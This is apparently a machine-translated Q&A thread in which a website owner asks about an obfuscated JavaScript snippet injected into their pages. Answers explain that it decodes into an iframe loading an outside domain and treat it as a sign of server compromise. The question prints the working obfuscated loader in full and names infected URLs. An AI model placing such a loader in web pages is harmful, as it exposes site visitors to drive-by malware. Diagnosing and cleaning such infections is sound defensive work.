Javascript "virus"

Question

私のウェブサイトのすべてのJS "ウイルス"に問題があります。彼らは異なるホスティングにあり、そのうちのいくつかにこのコードが表示されます。

<script> 
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) { 
    var i49d9f1a846737 = 16; 
    return (parseInt(i49d9f1a846377, i49d9f1a846737)); 
} 
function i49d9f1a8472f3(i49d9f1a8476d9) { 
    var i49d9f1a848679 = 2; 
    var i49d9f1a847da9 = ''; 
    i49d9f1a848e47 = String.fromCharCode; 
    for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) { 
     i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679)))); 
    } 
    return i49d9f1a847da9; 
} 
var r1a = ''; 
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E'; 
document.write(i49d9f1a8472f3(i49d9f1a84922e)); 
</script> 

NOD32ブロックのウェブサイト、彼はウイルスがあると考えているので。ソースからコードを削除しても、再度表示されるので、役立たない。静的なWebサイトにも表示されるため、XSSの結果になることはできません。

私は自分のシステムをフルスキャンしようとしましたが、それは役に立たなかった。すべてのウェブサイトにある唯一のものはGoogleアナリティクスですが、これは問題ではありません。

編集：たとえば、http://www.postuj.cz/test/またはhttp://flavicius.php5.cz/に表示されます。

Answer 1

これらは異なるホスティングに属しており、その中のいくつかにはこのコードが表示されます。

コードはすべてのホストで同じですか？影響を受けるドメインの例を挙げることができますので、マシン上だけでなく、サーバー側にもコードが存在することを確認できます（通常はそうはいかないでしょう）。

投稿したコードは確かに非常に疑わしいです。デコードされると、http：// ecom.rarebreedfootwear.com/にiframeが書き込まれます。 （キャッシュバスターの乱数をURLに追加しようとしますが、タイプミスのために失敗します）。

このアドレスでは明らかに脆弱性はありません。おそらく、最終的な標的攻撃がまだ行われていないか、後で実際の攻撃のためにテストされただけですが、自分自身を解読する予期しないJavaScript iframeは巨大な赤い旗であると付け加えます。通常、これはサーバーが侵害されていることを意味し、新しいパスワードで最初から再インストールする必要があります。

ETA：

あなたはhxxpで例えばそれを見ることができます。//flavicius.php5.cz/

感謝。実際に感染しているため、作業用URLを隠すためにコメントを削除しました。アプリケーションレベルであろうと、Apache自体であろうと、明らかではないが、すべてのページには疑わしいスクリプトが一番下にある。

少なくともアプリケーションとサーバーは危険にさらされているため、クリーニング、再インストール、および診断のためにオフラインにする必要があります。攻撃者がどのように侵入したかを調べる必要があります。最初の推測として、過去に多くのセキュリティホールに苦しんでいたWordPressの最新バージョンを確認してください。

Answer 2

Vundoまたはその変形版のようです。そのマルウェアの一部は、一見無意味なjavascriptをサイトに挿入する傾向があります（サーバー側ではなく、あなたの側で）。私はMalwarebytes' Anti-Malwareを試してみることをお勧めします。それをインストールして更新し、フルスキャンを実行します。それが失敗した場合は、おそらくVundoを削除するためのオプションを調べてみてください。